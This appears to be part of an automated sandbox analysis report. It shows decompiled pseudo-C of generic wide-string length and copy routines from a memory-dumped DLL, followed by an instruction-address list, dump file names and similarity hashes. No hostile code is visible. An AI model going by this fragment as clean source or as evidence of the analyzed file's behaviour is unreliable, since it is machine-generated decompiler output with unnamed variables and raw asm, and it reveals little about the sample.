																					if(_t458 < _t243) {
																						continue;
																					}
																					goto L47;
																				}
																				goto L196;
																			}
																			_t445 = _a4;
																			L192:
																			 *_t445 = 0;
																			_t445[1] = 0;
																			goto L71;
																		}
																		L183:
																		_v48 = 0;
																		_v44 = _t418;
																		_v28 = _t306;
																		_t421 = _v48;
																		while(1) {
																			_t307 =  *(_t389 + _t421 * 2) & 0x0000ffff;
																			 *(_t335 + _t421 * 2) = _t307;
																			__eflags = _t307;
																			if(_t307 == 0) {
																				break;
																			}
																			_t190 = _t421 * 2; // 0x2
																			_t249 = _t335 + _t190 + 2;
																			_t421 = _t421 + 1;
																			__eflags = _t421 - _t465;
																			if(_t421 < _t465) {
																				continue;
																			}
																			break;
																		}
																		_t306 = _v28;
																		_t418 = _v44;
																		goto L187;
																	}
																	_t465 = 0x7fffffff;
																	goto L183;
																}
																_v36 = _t389;
																_t336 = 0;
																__eflags = 0;
																_v28 = _t306;
																while(1) {
																	_t336 = _t336 + 1;
																	_t308 = _t418 + _t336 * 4;
																	_t249 = _t308 - 2;
																	__eflags =  *(_t308 - 2) & 0x0000ffff;
																	if(( *(_t308 - 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	_t249 = _t308;
																	__eflags =  *_t308 & 0x0000ffff;
																	if(( *_t308 & 0x0000ffff) != 0) {
																		continue;
																	}
																	break;
																}
																_t389 = _v36;
																_t306 = _v28;
																goto L180;
															}
															L161:
															_t341 = (_t248 >> 5 >> 0x1a) + _t248 >> 6;
															_t250 = _t248 & 0x8000003f;
															__eflags = _t250;
															if(_t250 < 0) {
																_t250 = (_t250 - 0x00000001 | 0xffffffc0) + 1;
																__eflags = _t250;
															}
															__eflags = _t250;
															_t342 = _t341 + (0 | _t250 > 0x00000000);
															_v40 = _t342 << 6;
															_push(_t342 << 7);
															_v36 = _t389;
															_t255 = E6E791030();
															_t389 = _v36;
															_t344 = _t255;
															_t473 = _t473 + 4;
															__eflags = _t418;
															if(_t418 == 0) {
																__eflags = 0;
																 *_t344 = 0;
																goto L172;
															} else {
																__eflags = _t344;
																if(_t344 == 0) {
																	L170:
																	_push(2);
																	_push(_t418);
																	_v68 = _t344;
																	_v36 = _t389;
																	E6E7910B0();
																	_t389 = _v36;
																	_t344 = _v68;
																	_t473 = _t473 + 8;
																	L172:
																	_t418 = _t344;
																	goto L173;
																}
																_t257 =  *_t418 & 0x0000ffff;
																 *_t344 = _t257;
																__eflags = _t257;
																if(_t257 == 0) {
																	goto L170;
																}
																_v28 = _t306;
																_t258 = 0;
																__eflags = 0;
																while(1) {
																	_t258 = _t258 + 1;
																	_t309 =  *(_t418 + _t258 * 4 - 2) & 0x0000ffff;
																	 *(_t344 + _t258 * 4 - 2) = _t309;
																	__eflags = _t309;
																	if(_t309 == 0) {
																		break;
																	}
																	_t310 =  *(_t418 + _t258 * 4) & 0x0000ffff;
																	 *(_t344 + _t258 * 4) = _t310;
																	__eflags = _t310;
																	if(_t310 != 0) {
																		continue;
																	}
																	break;
																}
																_t306 = _v28;
																goto L170;
															}
														}
														__eflags = _t418;
														if(_t418 == 0) {
															__eflags = _v40 - 0x40;
															if(_v40 < 0x40) {
																L159:
																_t248 = 0x40;
																goto L161;
															}
															goto L204;
														}
														_t334 = 0;
														 *_t418 = 0;
														__eflags = _v40 - 0x40;
														if(_v40 < 0x40) {
															goto L159;
														}
														_t249 = _t418;
														goto L175;
													}
													_t346 = _t418 & 0x0000000f;
													__eflags = _t346;
													if(_t346 == 0) {
														L148:
														asm("pxor xmm1, xmm1");
														_v28 = _t306;
														_t246 =  ~( ~_t346 + 0x00000007 & 0x00000007) + 0x7fffffff;
														__eflags = _t246;
														while(1) {
															asm("movdqu xmm0, [edi+ecx*2]");
															asm("pcmpeqw xmm0, xmm1");
															asm("pmovmskb ebx, xmm0");
															__eflags = _t306;
															if(_t306 != 0) {
																break;
															}
															_t346 = _t346 + 8;
															__eflags = _t346 - _t246;
															if(_t346 < _t246) {
																continue;
															}
															_t306 = _v28;
															__eflags = _t246 - 0x7fffffff;
															if(_t246 >= 0x7fffffff) {
																L154:
																_t246 = 0x7fffffff;
																goto L155;
															} else {
																goto L152;
															}
															while(1) {
																L152:
																__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
																if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
																	goto L155;
																}
																_t246 = _t246 + 1;
																__eflags = _t246 - 0x7fffffff;
																if(_t246 < 0x7fffffff) {
																	continue;
																}
																goto L154;
															}
															goto L155;
														}
														asm("bsf eax, eax");
														_t267 = _t306 >> 1;
														_t306 = _v28;
														_t246 = _t267 + _t346;
														goto L155;
													}
													_t246 = 0;
													__eflags = _t346 & 0x00000001;
													if((_t346 & 0x00000001) != 0) {
														goto L152;
													}
													_t346 =  ~_t346 + 0x10 >> 1;
													__eflags = _t346;
													_v28 = _t306;
													while(1) {
														__eflags =  *(_t418 + _t246 * 2) & 0x0000ffff;
														if(( *(_t418 + _t246 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t246 = _t246 + 1;
														__eflags = _t246 - _t346;
														if(_t246 < _t346) {
															continue;
														}
														_t306 = _v28;
														goto L148;
													}
													_t306 = _v28;
													goto L155;
												} else {
													goto L138;
												}
												while(1) {
													L138:
													__eflags =  *(_t389 + _t465 * 2) & 0x0000ffff;
													if(( *(_t389 + _t465 * 2) & 0x0000ffff) == 0) {
														goto L141;
													}
													_t465 = _t465 + 1;
													__eflags = _t465 - 0x7fffffff;
													if(_t465 < 0x7fffffff) {
														continue;
													}
													goto L140;
												}
												goto L141;
											}
											asm("bsf esi, ecx");
											_t465 = (_t465 >> 1) + _t245;
											goto L141;
										}
										_t465 = 0;
										__eflags = _t245 & 0x00000001;
										if((_t245 & 0x00000001) != 0) {
											goto L138;
										}
										_t245 =  ~_t245 + 0x10 >> 1;
										__eflags = _t245;
										while(1) {
											_t316 =  *(_t389 + _t465 * 2) & 0x0000ffff;
											__eflags = _t316;
											if(_t316 == 0) {
												goto L141;
											}
											_t465 = _t465 + 1;
											__eflags = _t465 - _t245;
											if(_t465 < _t245) {
												continue;
											}
											goto L134;
										}
										goto L141;
									}
									goto L68;
								}
								_t405 = (_t332 >> 5 >> 0x1a) + _t332 >> 6;
								_t351 = _t332 & 0x8000003f;
								__eflags = _t351;
								if(_t351 < 0) {
									_t351 = (_t351 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t351;
								}
								__eflags = _t351;
								_t406 = _t405 + (0 | _t351 > 0x00000000);
								_v40 = _t406 << 6;
								_push(_t406 << 7);
								_t272 = E6E791030();
								_t473 = _t473 + 4;
								__eflags = _t418;
								if(_t418 == 0) {
									__eflags = 0;
									 *_t272 = 0;
									goto L65;
								} else {
									__eflags = _t272;
									if(_t272 == 0) {
										L63:
										_push(2);
										_push(_t418);
										_v64 = _t272;
										E6E7910B0();
										_t272 = _v64;
										_t473 = _t473 + 8;
										L65:
										_t418 = _t272;
										goto L66;
									}
									_t409 =  *_t418 & 0x0000ffff;
									 *_t272 = _t409;
									__eflags = _t409;
									if(_t409 == 0) {
										goto L63;
									}
									_t410 = 0;
									__eflags = 0;
									while(1) {
										_t410 = _t410 + 1;
										_t354 =  *(_t418 + _t410 * 4 - 2) & 0x0000ffff;
										 *(_t272 + _t410 * 4 - 2) = _t354;
										__eflags = _t354;
										if(_t354 == 0) {
											goto L63;
										}
										_t355 =  *(_t418 + _t410 * 4) & 0x0000ffff;
										 *(_t272 + _t410 * 4) = _t355;
										__eflags = _t355;
										if(_t355 != 0) {
											continue;
										}
										goto L63;
									}
									goto L63;
								}
							}
							_v32 = _t241;
							goto L42;
							L68:
							_t241 = _t452;
							_t306 = _t306 + 1;
							__eflags = _t306 -  *_t241;
						} while (_t306 <  *_t241);
						_t445 = _a4;
						goto L70;
					}
					__eflags =  *_t364 & 0x0000ffff;
					if(( *_t364 & 0x0000ffff) == 0) {
						goto L37;
					}
					_t277 = _t364 & 0x0000000f;
					__eflags = _t277;
					if(_t277 == 0) {
						L18:
						asm("pxor xmm0, xmm0");
						_t429 =  ~( ~_t277 + 0x00000007 & 0x00000007) + 0x7fffffff;
						__eflags = _t429;
						_v64 = _t429;
						_t467 = _t429;
						while(1) {
							asm("movdqu xmm1, [edx+eax*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb edi, xmm1");
							__eflags = _t429;
							if(_t429 != 0) {
								break;
							}
							_t277 = _t277 + 8;
							__eflags = _t277 - _t467;
							if(_t277 < _t467) {
								continue;
							}
							_v64 = _t467;
							_t445 = _a4;
							__eflags = _v64 - 0x7fffffff;
							if(_v64 >= 0x7fffffff) {
								L25:
								_v64 = 0x7fffffff;
								L26:
								_t433 = _v64 + 1;
								__eflags = _t433 - 0x40;
								_t434 =  <=  ? 0x40 : _t433;
								__eflags = _t434;
								if(_t434 > 0) {
									_t283 = (_t434 >> 5 >> 0x1a) + _t434 >> 6;
									_t435 = _t434 & 0x8000003f;
									__eflags = _t435;
									if(_t435 < 0) {
										_t435 = (_t435 - 0x00000001 | 0xffffffc0) + 1;
										__eflags = _t435;
									}
									__eflags = _t435;
									_t284 = _t283 + (0 | _t435 > 0x00000000);
									_v40 = _t284 << 6;
									_push(_t284 << 7);
									_v68 = _t364;
									_t286 = E6E791030();
									_t411 = _v68;
									_t473 = _t473 + 4;
									_t418 = _t286;
									 *_t286 = 0;
									_v32 = _t294;
									_t468 = _v64;
									while(1) {
										_t312 =  *_t411 & 0x0000ffff;
										_t316 = 1;
										 *_t286 = _t312;
										__eflags = _t468;
										if(_t468 == 0) {
											goto L35;
										}
										__eflags = 1 - _t468;
										if(1 == _t468) {
											__eflags = 0;
											_t445 = _a4;
											_t294 = _v32;
											_t286[0] = 0;
											L191:
											__eflags =  *_t294 - 1;
											if( *_t294 > 1) {
												goto L39;
											}
											goto L192;
										}
										L35:
										__eflags = _t312;
										if(_t312 == 0) {
											_t445 = _a4;
											_t294 = _v32;
											goto L191;
										}
										_t286 =  &(_t286[0]);
										_t411 = _t411 + 2;
										__eflags = _t411;
									}
								}
								_t418 = 0;
								__eflags = _t316 - 1;
								if(_t316 <= 1) {
									goto L70;
								}
								_v40 = 0;
								goto L39;
							}
							L22:
							_t287 = _v64;
							while(1) {
								__eflags =  *(_t364 + _t287 * 2) & 0x0000ffff;
								if(( *(_t364 + _t287 * 2) & 0x0000ffff) == 0) {
									break;
								}
								_t287 = _t287 + 1;
								__eflags = _t287 - 0x7fffffff;
								if(_t287 < 0x7fffffff) {
									continue;
								}
								goto L25;
							}
							_v64 = _t287;
							goto L26;
						}
						asm("bsf edi, edi");
						_t445 = _a4;
						_v64 = (_t429 >> 1) + _t277;
						goto L26;
					}
					_t441 = 0;
					_v64 = 0;
					__eflags = _t277 & 0x00000001;
					if((_t277 & 0x00000001) != 0) {
						goto L22;
					}
					_t277 =  ~_t277 + 0x10 >> 1;
					__eflags = _t277;
					while(1) {
						__eflags =  *(_t364 + _t441 * 2) & 0x0000ffff;
						if(( *(_t364 + _t441 * 2) & 0x0000ffff) == 0) {
							break;
						}
						_t441 = _t441 + 1;
						__eflags = _t441 - _t277;
						if(_t441 < _t277) {
							continue;
						}
						goto L18;
					}
					_v64 = _t441;
					_t445 = _a4;
					goto L26;
				}
				_push(0x80);
				 *_t445 = 0;
				_t445[1] = 0;
				_t313 = E6E791030();
				_t474 = _t473 + 4;
				_t414 =  *_t445;
				if(_t414 == 0) {
					__eflags = 0;
					 *_t313 = 0;
					L9:
					 *_t445 = _t313;
					_t445[1] = 0x40;
					goto L115;
				}
				if(_t313 == 0) {
					L7:
					_push(2);
					_push(_t414);
					E6E7910B0();
					_t474 = _t474 + 8;
					goto L9;
				}
				_t361 =  *_t414 & 0x0000ffff;
				 *_t313 = _t361;
				if(_t361 == 0) {
					goto L7;
				}
				_t362 = 0;
				while(1) {
					_t362 = _t362 + 1;
					_t442 =  *(_t414 + _t362 * 4 - 2) & 0x0000ffff;
					 *(_t313 + _t362 * 4 - 2) = _t442;
					if(_t442 == 0) {
						goto L7;
					}
					_t443 =  *(_t414 + _t362 * 4) & 0x0000ffff;
					 *(_t313 + _t362 * 4) = _t443;
					if(_t443 != 0) {
						continue;
					}
					goto L7;
				}
				goto L7;
			}

0x6e79d039
0x6e79d043
0x6e79d04f
0x6e79d051
0x6e79d054
0x6e79d058
0x6e79d0c6
0x6e79d0c8
0x6e79d0ca
0x6e79d214
0x6e79d214
0x6e79d21e
0x6e79d220
0x6e79d225
0x6e79d228
0x6e79d22b
0x6e79d3a1
0x6e79d3a3
0x6e79d3a5
0x6e79d3a8
0x6e79d3aa
0x6e79d507
0x6e79d507
0x6e79d511
0x6e79d513
0x6e79d516
0x6e79d518
0x6e79d51a
0x6e79d554
0x6e79d556
0x6e79d559
0x6e79d559
0x6e79d55b
0x6e79d562
0x6e79d562
0x6e79d564
0x6e79d565
0x6e79d56a
0x6e79d56d
0x6e79d56d
0x6e79d573
0x6e79d577
0x6e79d57b
0x6e79d581
0x6e79d5dc
0x6e79d5dc
0x6e79d5de
0x6e79d5df
0x6e79d5e7
0x6e79d5fa
0x6e79d5fa
0x6e79d585
0x6e79d587
0x6e79d8fb
0x6e79d5c2
0x6e79d5c7
0x6e79d5c9
0x6e79d5cf
0x6e79d5d1
0x6e79d5d3
0x6e79d5d8
0x6e79d5d8
0x6e79d5cf
0x00000000
0x6e79d5c7
0x6e79d58d
0x6e79d58f
0x6e79d591
0x6e79d591
0x6e79d596
0x6e79d598
0x6e79d59a
0x6e79d59f
0x6e79d59f
0x6e79d5a3
0x6e79d5a9
0x6e79d5ab
0x6e79d5ad
0x6e79d5b2
0x6e79d5b2
0x6e79d5b6
0x6e79d5b7
0x6e79d5bb
0x6e79d5be
0x00000000
0x6e79d5be
0x6e79d51c
0x6e79d51e
0x6e79d547
0x6e79d547
0x6e79d549
0x6e79d54a
0x6e79d54f
0x00000000
0x6e79d54f
0x6e79d520
0x6e79d523
0x6e79d526
0x6e79d528
0x00000000
0x00000000
0x6e79d52a
0x6e79d52a
0x6e79d52c
0x6e79d52c
0x6e79d52d
0x6e79d532
0x6e79d537
0x6e79d539
0x00000000
0x00000000
0x6e79d53b
0x6e79d53f
0x6e79d543
0x6e79d545
0x00000000
0x00000000
0x00000000
0x6e79d545
0x00000000
0x6e79d52c
0x6e79d3b0
0x6e79d3b3
0x6e79d3b5
0x00000000
0x00000000
0x6e79d3bd
0x6e79d3bd
0x6e79d3c0
0x6e79d3dd
0x6e79d3e1
0x6e79d3ed
0x6e79d3ed
0x6e79d3f3
0x6e79d3f3
0x6e79d3f8
0x6e79d3fc
0x6e79d400
0x6e79d402
0x00000000
0x00000000
0x6e79d408
0x6e79d40b
0x6e79d40d
0x00000000
0x00000000
0x6e79d40f
0x6e79d415
0x6e79d428
0x6e79d428
0x6e79d42d
0x6e79d432
0x6e79d432
0x6e79d435
0x6e79d438
0x6e79d43b
0x6e79d43d
0x6e79d450
0x6e79d453
0x6e79d453
0x6e79d458
0x6e79d460
0x6e79d460
0x6e79d460
0x6e79d463
0x6e79d468
0x6e79d472
0x6e79d476
0x6e79d477
0x6e79d47c
0x6e79d47f
0x6e79d481
0x6e79d483
0x6e79d4c8
0x6e79d4ca
0x00000000
0x6e79d485
0x6e79d485
0x6e79d487
0x6e79d4b3
0x6e79d4b3
0x6e79d4b5
0x6e79d4b6
0x6e79d4ba
0x6e79d4bf
0x6e79d4c3
0x6e79d4cd
0x6e79d4d1
0x6e79d4d4
0x6e79d4d6
0x6e79d4d6
0x6e79d4d8
0x6e79d4da
0x00000000
0x00000000
0x6e79d4e0
0x6e79d4ea
0x6e79d4ea
0x6e79d4ed
0x6e79d4ee
0x6e79d4f1
0x6e79d4f3
0x00000000
0x00000000
0x6e79d4f5
0x6e79d4f7
0x6e79d8db
0x6e79d8de
0x00000000
0x6e79d8de
0x6e79d4fd
0x6e79d4fd
0x6e79d4ff
0x6e79d8e7
0x00000000
0x6e79d8e7
0x6e79d4e4
0x6e79d4e7
0x6e79d4e7
0x6e79d4e7
0x6e79d4ea
0x6e79d489
0x6e79d48c
0x6e79d48f
0x6e79d491
0x00000000
0x00000000
0x6e79d493
0x6e79d493
0x6e79d495
0x6e79d495
0x6e79d496
0x6e79d49b
0x6e79d4a0
0x6e79d4a2
0x00000000
0x00000000
0x6e79d4a4
0x6e79d4a8
0x6e79d4ac
0x6e79d4ae
0x00000000
0x00000000
0x00000000
0x6e79d4ae
0x6e79d4b0
0x00000000
0x6e79d4b0
0x6e79d483
0x6e79d43f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79d417
0x6e79d417
0x6e79d41b
0x6e79d41d
0x00000000
0x00000000
0x6e79d41f
0x6e79d420
0x6e79d426
0x00000000
0x00000000
0x00000000
0x6e79d426
0x00000000
0x6e79d417
0x6e79d8ef
0x6e79d8f4
0x00000000
0x6e79d8f4
0x6e79d3c2
0x6e79d3c4
0x6e79d3c7
0x00000000
0x00000000
0x6e79d3ce
0x6e79d3ce
0x6e79d3d0
0x6e79d3d0
0x6e79d3d4
0x6e79d3d6
0x00000000
0x00000000
0x6e79d3d8
0x6e79d3d9
0x6e79d3db
0x00000000
0x00000000
0x00000000
0x6e79d3db
0x00000000
0x6e79d3d0
0x6e79d231
0x6e79d239
0x6e79d23b
0x6e79d23c
0x6e79d23e
0x6e79d240
0x6e79d244
0x6e79d246
0x6e79d246
0x6e79d248
0x6e79d977
0x6e79d924
0x6e79d924
0x6e79d928
0x6e79d2cb
0x6e79d2d0
0x6e79d2d0
0x6e79d2d3
0x6e79d2d6
0x6e79d2d9
0x6e79d2dd
0x6e79d368
0x6e79d36d
0x6e79d36f
0x6e79d373
0x6e79d378
0x6e79d382
0x6e79d384
0x6e79d386
0x00000000
0x00000000
0x6e79d388
0x6e79d38b
0x6e79d38d
0x6e79d5fd
0x6e79d5ff
0x00000000
0x00000000
0x6e79d607
0x6e79d607
0x6e79d60a
0x6e79d626
0x6e79d62a
0x6e79d636
0x6e79d636
0x6e79d63c
0x6e79d63c
0x6e79d641
0x6e79d645
0x6e79d649
0x6e79d64b
0x00000000
0x00000000
0x6e79d651
0x6e79d654
0x6e79d656
0x00000000
0x00000000
0x6e79d658
0x6e79d65e
0x6e79d671
0x6e79d671
0x6e79d676
0x6e79d676
0x6e79d678
0x6e79d958
0x6e79d701
0x6e79d701
0x6e79d701
0x6e79d705
0x6e79d707
0x6e79d730
0x6e79d733
0x6e79d736
0x6e79d73a
0x6e79d7e1
0x6e79d7e1
0x6e79d7e3
0x6e79d7e5
0x6e79d919
0x6e79d919
0x6e79d91d
0x6e79d91f
0x6e79d920
0x6e79d922
0x6e79d92f
0x6e79d934
0x6e79d936
0x00000000
0x6e79d936
0x00000000
0x6e79d922
0x6e79d7eb
0x6e79d7ee
0x6e79d7ee
0x6e79d7f0
0x6e79d81c
0x6e79d81c
0x6e79d81e
0x6e79d820
0x6e79d829
0x6e79d85c
0x6e79d85c
0x6e79d860
0x6e79d862
0x6e79d865
0x6e79d866
0x6e79d868
0x6e79d252
0x6e79d254
0x6e79d254
0x6e79d257
0x6e79d277
0x6e79d27b
0x6e79d287
0x6e79d287
0x6e79d28d
0x6e79d28d
0x6e79d292
0x6e79d296
0x6e79d29a
0x6e79d29c
0x00000000
0x00000000
0x6e79d2a2
0x6e79d2a5
0x6e79d2a7
0x00000000
0x00000000
0x6e79d2a9
0x6e79d2af
0x6e79d2c6
0x6e79d2c6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79d2b1
0x6e79d2b1
0x6e79d2b5
0x6e79d2b7
0x00000000
0x00000000
0x6e79d2bd
0x6e79d2be
0x6e79d2c4
0x00000000
0x00000000
0x00000000
0x6e79d2c4
0x6e79d8c6
0x6e79d8c6
0x6e79d8c9
0x6e79d8d1
0x6e79d8d1
0x00000000
0x6e79d8c9
0x6e79d96b
0x6e79d970
0x00000000
0x6e79d970
0x6e79d259
0x6e79d25b
0x6e79d25d
0x00000000
0x00000000
0x6e79d264
0x6e79d264
0x6e79d266
0x6e79d266
0x6e79d26a
0x6e79d26c
0x00000000
0x00000000
0x6e79d272
0x6e79d273
0x6e79d275
0x00000000
0x00000000
0x00000000
0x6e79d275
0x00000000
0x6e79d266
0x6e79d93e
0x6e79d895
0x6e79d897
0x6e79d899
0x00000000
0x6e79d899
0x6e79d82b
0x6e79d82b
0x6e79d833
0x6e79d837
0x6e79d83b
0x6e79d83f
0x6e79d83f
0x6e79d843
0x6e79d847
0x6e79d849
0x00000000
0x00000000
0x6e79d84b
0x6e79d84b
0x6e79d84f
0x6e79d850
0x6e79d852
0x00000000
0x00000000
0x00000000
0x6e79d852
0x6e79d854
0x6e79d858
0x00000000
0x6e79d858
0x6e79d822
0x00000000
0x6e79d822
0x6e79d7f2
0x6e79d7f6
0x6e79d7f6
0x6e79d7f8
0x6e79d7fc
0x6e79d7fc
0x6e79d7fd
0x6e79d804
0x6e79d807
0x6e79d809
0x00000000
0x00000000
0x6e79d80e
0x6e79d810
0x6e79d812
0x00000000
0x00000000
0x00000000
0x6e79d812
0x6e79d814
0x6e79d818
0x00000000
0x6e79d818
0x6e79d740
0x6e79d74a
0x6e79d74d
0x6e79d74d
0x6e79d752
0x6e79d75a
0x6e79d75a
0x6e79d75a
0x6e79d75b
0x6e79d765
0x6e79d76f
0x6e79d773
0x6e79d774
0x6e79d778
0x6e79d77d
0x6e79d781
0x6e79d783
0x6e79d786
0x6e79d788
0x6e79d7da
0x6e79d7dc
0x00000000
0x6e79d78a
0x6e79d78a
0x6e79d78c
0x6e79d7bd
0x6e79d7bd
0x6e79d7bf
0x6e79d7c0
0x6e79d7c4
0x6e79d7c8
0x6e79d7cd
0x6e79d7d1
0x6e79d7d5
0x6e79d7df
0x6e79d7df
0x00000000
0x6e79d7df
0x6e79d78e
0x6e79d791
0x6e79d794
0x6e79d796
0x00000000
0x00000000
0x6e79d798
0x6e79d79c
0x6e79d79c
0x6e79d79e
0x6e79d79e
0x6e79d79f
0x6e79d7a4
0x6e79d7a9
0x6e79d7ab
0x00000000
0x00000000
0x6e79d7ad
0x6e79d7b1
0x6e79d7b5
0x6e79d7b7
0x00000000
0x00000000
0x00000000
0x6e79d7b7
0x6e79d7b9
0x00000000
0x6e79d7b9
0x6e79d788
0x6e79d709
0x6e79d70b
0x6e79d90e
0x6e79d913
0x6e79d724
0x6e79d724
0x00000000
0x6e79d724
0x00000000
0x6e79d913
0x6e79d711
0x6e79d713
0x6e79d716
0x6e79d71b
0x00000000
0x00000000
0x6e79d71d
0x00000000
0x6e79d71d
0x6e79d680
0x6e79d680
0x6e79d683
0x6e79d6ac
0x6e79d6b0
0x6e79d6bc
0x6e79d6c0
0x6e79d6c0
0x6e79d6c5
0x6e79d6c5
0x6e79d6ca
0x6e79d6ce
0x6e79d6d2
0x6e79d6d4
0x00000000
0x00000000
0x6e79d6da
0x6e79d6dd
0x6e79d6df
0x00000000
0x00000000
0x6e79d6e1
0x6e79d6e5
0x6e79d6ea
0x6e79d6fc
0x6e79d6fc
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79d6ec
0x6e79d6ec
0x6e79d6f0
0x6e79d6f2
0x00000000
0x00000000
0x6e79d6f4
0x6e79d6f5
0x6e79d6fa
0x00000000
0x00000000
0x00000000
0x6e79d6fa
0x00000000
0x6e79d6ec
0x6e79d948
0x6e79d94b
0x6e79d94d
0x6e79d951
0x00000000
0x6e79d951
0x6e79d685
0x6e79d687
0x6e79d68a
0x00000000
0x00000000
0x6e79d691
0x6e79d691
0x6e79d693
0x6e79d697
0x6e79d69b
0x6e79d69d
0x00000000
0x00000000
0x6e79d6a3
0x6e79d6a4
0x6e79d6a6
0x00000000
0x00000000
0x6e79d6a8
0x00000000
0x6e79d6a8
0x6e79d905
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79d660
0x6e79d660
0x6e79d664
0x6e79d666
0x00000000
0x00000000
0x6e79d668
0x6e79d669
0x6e79d66f
0x00000000
0x00000000
0x00000000
0x6e79d66f
0x00000000
0x6e79d660
0x6e79d95f
0x6e79d964
0x00000000
0x6e79d964
0x6e79d60c
0x6e79d60e
0x6e79d610
0x00000000
0x00000000
0x6e79d617
0x6e79d617
0x6e79d619
0x6e79d619
0x6e79d61d
0x6e79d61f
0x00000000
0x00000000
0x6e79d621
0x6e79d622
0x6e79d624
0x00000000
0x00000000
0x00000000
0x6e79d624
0x00000000
0x6e79d619
0x00000000
0x6e79d38d
0x6e79d2ed
0x6e79d2f0
0x6e79d2f0
0x6e79d2f6
0x6e79d2fe
0x6e79d2fe
0x6e79d2fe
0x6e79d301
0x6e79d306
0x6e79d310
0x6e79d314
0x6e79d315
0x6e79d31a
0x6e79d31d
0x6e79d31f
0x6e79d361
0x6e79d363
0x00000000
0x6e79d321
0x6e79d321
0x6e79d323
0x6e79d34c
0x6e79d34c
0x6e79d34e
0x6e79d34f
0x6e79d353
0x6e79d358
0x6e79d35c
0x6e79d366
0x6e79d366
0x00000000
0x6e79d366
0x6e79d325
0x6e79d328
0x6e79d32b
0x6e79d32d
0x00000000
0x00000000
0x6e79d32f
0x6e79d32f
0x6e79d331
0x6e79d331
0x6e79d332
0x6e79d337
0x6e79d33c
0x6e79d33e
0x00000000
0x00000000
0x6e79d340
0x6e79d344
0x6e79d348
0x6e79d34a
0x00000000
0x00000000
0x00000000
0x6e79d34a
0x00000000
0x6e79d331
0x6e79d31f
0x6e79d24e
0x00000000
0x6e79d393
0x6e79d393
0x6e79d395
0x6e79d396
0x6e79d396
0x6e79d39e
0x00000000
0x6e79d39e
0x6e79d0d3
0x6e79d0d5
0x00000000
0x00000000
0x6e79d0dd
0x6e79d0dd
0x6e79d0e0
0x6e79d107
0x6e79d10b
0x6e79d117
0x6e79d117
0x6e79d11d
0x6e79d121
0x6e79d123
0x6e79d123
0x6e79d128
0x6e79d12c
0x6e79d130
0x6e79d132
0x00000000
0x00000000
0x6e79d138
0x6e79d13b
0x6e79d13d
0x00000000
0x00000000
0x6e79d13f
0x6e79d143
0x6e79d146
0x6e79d14e
0x6e79d168
0x6e79d168
0x6e79d170
0x6e79d179
0x6e79d17c
0x6e79d17f
0x6e79d182
0x6e79d184
0x6e79d1a8
0x6e79d1ab
0x6e79d1ab
0x6e79d1b1
0x6e79d1b9
0x6e79d1b9
0x6e79d1b9
0x6e79d1bc
0x6e79d1c1
0x6e79d1cb
0x6e79d1cf
0x6e79d1d0
0x6e79d1d4
0x6e79d1d9
0x6e79d1dd
0x6e79d1e2
0x6e79d1e4
0x6e79d1e7
0x6e79d1eb
0x6e79d1f7
0x6e79d1f7
0x6e79d1fa
0x6e79d1fb
0x6e79d1fe
0x6e79d200
0x00000000
0x00000000
0x6e79d202
0x6e79d204
0x6e79d87f
0x6e79d881
0x6e79d884
0x6e79d888
0x6e79d88c
0x6e79d88c
0x6e79d88f
0x00000000
0x00000000
0x00000000
0x6e79d88f
0x6e79d20a
0x6e79d20a
0x6e79d20c
0x6e79d8a1
0x6e79d8a4
0x00000000
0x6e79d8a4
0x6e79d1f1
0x6e79d1f4
0x6e79d1f4
0x6e79d1f4
0x6e79d1f7
0x6e79d186
0x6e79d188
0x6e79d18b
0x00000000
0x00000000
0x6e79d191
0x00000000
0x6e79d191
0x6e79d150
0x6e79d150
0x6e79d154
0x6e79d158
0x6e79d15a
0x00000000
0x00000000
0x6e79d160
0x6e79d161
0x6e79d166
0x00000000
0x00000000
0x00000000
0x6e79d166
0x6e79d8aa
0x00000000
0x6e79d8aa
0x6e79d8b3
0x6e79d8ba
0x6e79d8bd
0x00000000
0x6e79d8bd
0x6e79d0e2
0x6e79d0e4
0x6e79d0e8
0x6e79d0ea
0x00000000
0x00000000
0x6e79d0f1
0x6e79d0f1
0x6e79d0f3
0x6e79d0f7
0x6e79d0f9
0x00000000
0x00000000
0x6e79d0ff
0x6e79d100
0x6e79d102
0x00000000
0x00000000
0x00000000
0x6e79d104
0x6e79d873
0x6e79d877
0x00000000
0x6e79d877
0x6e79d05a
0x6e79d061
0x6e79d063
0x6e79d06b
0x6e79d06d
0x6e79d070
0x6e79d074
0x6e79d0ae
0x6e79d0b0
0x6e79d0b3
0x6e79d0b3
0x6e79d0b5
0x00000000
0x6e79d0b5
0x6e79d078
0x6e79d0a1
0x6e79d0a1
0x6e79d0a3
0x6e79d0a4
0x6e79d0a9
0x00000000
0x6e79d0a9
0x6e79d07a
0x6e79d07d
0x6e79d082
0x00000000
0x00000000
0x6e79d084
0x6e79d086
0x6e79d086
0x6e79d087
0x6e79d08c
0x6e79d093
0x00000000
0x00000000
0x6e79d095
0x6e79d099
0x6e79d09f
0x00000000
0x00000000
0x00000000
0x6e79d09f
0x00000000

Strings

@, xrefs: 6E79D90E

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction ID: 45d45646da96033eb227c2b7c8c4de6caf5681e130f83dffee0f22bb1c467cd1
Opcode Fuzzy Hash: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction Fuzzy Hash: 39426971A047128BD7048FADE65022A73E2BFC5354F15863CDAA9873B5EB34D841EF86

Uniqueness

Uniqueness Score: -1.00%

